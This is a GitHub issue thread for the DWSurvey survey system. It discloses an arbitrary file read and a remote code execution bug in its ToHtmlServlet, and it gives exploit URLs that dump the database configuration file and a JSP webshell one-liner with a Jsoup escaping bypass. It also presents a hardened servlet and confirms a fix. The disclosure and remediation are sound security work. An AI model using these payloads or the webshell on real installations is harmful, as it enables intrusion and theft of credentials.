wkeyuan / DWSurvey

Survey System. 最好用的开源问卷调查系统、表单系统。
http://www.diaowen.net
GNU Affero General Public License v3.0
2.59k stars 755 forks

There are arbitrary file reading vulnerabilities and backend RCE vulnerabilities #80

Closed. lavon321 closed this 2 years ago

lavon321 commented 2 years ago

In the latest version, dwsurvey-oss-v3.2.0, there is a RequestDispatcher.forward request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response is output to a byte array buffer in memory, and finally the file is written in the printStream function. Because RequestDispatcher.forward is a jump between internal resources, you can request internal sensitive files on the server, such as /WEB-INF/web.xml, causing an arbitrary file read vulnerability by writing the content to a file and then accessing it again; in addition, combined with file upload in the admin backend, it can also lead to RCE.

Request forwarding exists in the server method in the com/key/common/utils/ToHtmlServlet.java file. Because a ByteArrayOutputStream is used, the forwarded response is saved in a byte array buffer in memory. This is passed into the flushDo function, where it is converted into a string and assigned to the document variable, which is then passed into the printStream function. savepath and filename are spliced together as the target file, and finally the response content is written to that file. The savepath and filename variables can also be controlled, as shown above.

Payload:
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/classes/conf/application.properties
The 1.txt file is written to the web root directory and can then be accessed at http://localhost:8888/diaowen/1.txt, successfully reading the database configuration file.

You can also find a file upload point in the admin backend to achieve RCE: in the backend, create a new questionnaire -> Advanced Editor, upload an image webshell, and capture the request with Burp Suite.

Visit http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.jsp&url=/ueditor/jsp/upload/image/20210815/1629018633885086990.png and the JSP file will be generated in the web root directory. Because the Jsoup.parse method escapes JSP tags when parsing, in testing, wrapping the payload in '<script></script>' tags successfully bypassed the escaping. So the content of the uploaded image file is:
<script><%Runtime.getRuntime().exec(request.getParameter("i"));%></script>
Visit http://localhost:8888/diaowen/1.jsp?i=calc, and RCE succeeds.
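
A hardened version of the forward-and-capture pattern described in this issue, written as an added example for this page; it is not DWSurvey's own ToHtmlServlet code. The class name SafeToHtmlServlet, the /survey/ allow-list prefix, the static-export output directory and the doGet entry point are assumptions; the url and fileName parameter names are the ones from the payloads above. The filePath parameter is deliberately not accepted, the output directory is fixed in code, and the extension is always .html, so neither the WEB-INF read nor the 1.jsp write is reachable through the validated paths.

```java
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.io.PrintWriter;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Locale;
import java.util.regex.Pattern;
import javax.servlet.RequestDispatcher;
import javax.servlet.ServletException;
import javax.servlet.ServletOutputStream;
import javax.servlet.WriteListener;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpServletResponseWrapper;

// Added example, not DWSurvey code: a render-to-HTML servlet that forwards internally and captures
// the output, but only to allow-listed targets and into a fixed directory with a fixed extension.
public class SafeToHtmlServlet extends HttpServlet {

    // Assumption: rendered survey pages live under this path; uploads and WEB-INF never do.
    private static final String ALLOWED_FORWARD_PREFIX = "/survey/";
    // Conservative charset for the forward path: no ';', '?', '%', backslash or whitespace.
    private static final Pattern SAFE_FORWARD_PATH = Pattern.compile("/[A-Za-z0-9_./-]*");
    // Output base name only; the extension is appended in code, so a 1.jsp can never be written.
    private static final Pattern SAFE_FILE_NAME = Pattern.compile("[A-Za-z0-9_-]{1,64}");
    // Assumption: fixed export directory below the web root, never taken from the request.
    private static final String EXPORT_DIR = "static-export";

    /** Buffers whatever the forwarded resource writes instead of sending it to the client. */
    static final class CapturingResponse extends HttpServletResponseWrapper {
        private final ByteArrayOutputStream buffer = new ByteArrayOutputStream();
        private final PrintWriter writer =
                new PrintWriter(new OutputStreamWriter(buffer, StandardCharsets.UTF_8));
        private final ServletOutputStream stream = new ServletOutputStream() {
            @Override public void write(int b) { buffer.write(b); }
            public boolean isReady() { return true; }                 // Servlet 3.1 API
            public void setWriteListener(WriteListener listener) { }  // Servlet 3.1 API
        };

        CapturingResponse(HttpServletResponse wrapped) { super(wrapped); }
        @Override public ServletOutputStream getOutputStream() { return stream; }
        @Override public PrintWriter getWriter() { return writer; }

        byte[] captured() { writer.flush(); return buffer.toByteArray(); }
    }

    /** Normalized forward target, or null if the request must be rejected (allow-list, not block-list). */
    static String validatedForwardTarget(String url) {
        if (url == null || !SAFE_FORWARD_PATH.matcher(url).matches()) return null;
        // Collapse "." and ".." first, then check; a block-list on the raw string misses /survey/../WEB-INF.
        String normalized = Paths.get(url).normalize().toString().replace('\\', '/');
        String lower = normalized.toLowerCase(Locale.ROOT);
        if (lower.contains("web-inf") || lower.contains("meta-inf")) return null;
        return normalized.startsWith(ALLOWED_FORWARD_PREFIX) ? normalized : null;
    }

    /** Export path inside EXPORT_DIR for a validated base name, or null if the name is rejected. */
    static Path validatedExportPath(Path webRoot, String fileName) {
        if (fileName == null || !SAFE_FILE_NAME.matcher(fileName).matches()) return null;
        Path exportDir = webRoot.resolve(EXPORT_DIR).toAbsolutePath().normalize();
        Path target = exportDir.resolve(fileName + ".html").normalize();
        // The regex already forbids separators; containment is checked anyway.
        return target.startsWith(exportDir) ? target : null;
    }

    @Override
    protected void doGet(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        String target = validatedForwardTarget(req.getParameter("url"));
        String realPath = getServletContext().getRealPath("/");   // null for an unexploded WAR
        Path out = realPath == null
                ? null : validatedExportPath(Paths.get(realPath), req.getParameter("fileName"));
        if (target == null || out == null) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "invalid url or fileName");
            return;
        }

        CapturingResponse capture = new CapturingResponse(resp);
        RequestDispatcher dispatcher = req.getRequestDispatcher(target);
        dispatcher.forward(req, capture);          // output lands in the buffer, not on the wire

        Files.createDirectories(out.getParent());
        Files.write(out, capture.captured());
        resp.setContentType("text/plain;charset=UTF-8");
        resp.getWriter().write("exported " + out.getFileName());
    }
}
```

The two checks are independent on purpose: even if the forward allow-list were loosened later, the fixed directory and forced .html extension still prevent the uploaded-PNG-to-1.jsp step, and even if the file name check were loosened, the allow-list still keeps WEB-INF out of the buffer. Normalization runs before the WEB-INF test because a raw-string block-list is bypassed by /survey/../WEB-INF/web.xml, and the path regex rejects the ';' and '%' characters that container path-parameter and double-encoding tricks rely on.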

wkeyuan commented 2 years ago

The version has been updated; please check whether the issue still exists.

lavon321 commented 2 years ago

The new version does not have this issue.